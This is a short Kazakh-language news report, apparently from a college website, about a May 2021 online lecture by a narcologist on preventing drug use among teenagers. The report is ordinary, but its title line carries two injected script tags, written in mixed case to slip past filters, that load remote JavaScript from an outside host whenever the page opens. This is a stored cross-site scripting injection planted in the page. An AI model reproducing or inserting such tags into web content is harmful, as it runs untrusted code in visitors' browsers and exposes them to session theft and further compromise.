Жасөспірімдер арасында есірткі заттарын қолданудың алдын алу<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
20.05.2021
19.05.2021ж. индустриалдық-техникалық колледжде есірткі және психобелсенді заттарға және оларды қолдану салдарына теріс қатынасты қалыптастыру мақсатында "Жасөспірімдер арасында есірткі заттарын қолданудың алдын алу" тақырыбында онлайн - лекторий өтті. Студенттермен дәрісті "Облыстық психикалық денсаулық орталығы" ШЖҚ МКК фельдшер - наркологы Метлина Елена Александровна өткізді. Конференция барысында Елена Александровна нашақорлық мәселелеріне назар аударып, студенттерге есірткі заттарының адам ағзасына және психикалық денсаулығына әсері туралы айтты.
Мұндай іс-шаралар зиянды әдеттерге саналы түрде теріс көзқарас қалыптастыруға мүмкіндік береді.
Сатанова А.Б.
Просмотров: 1218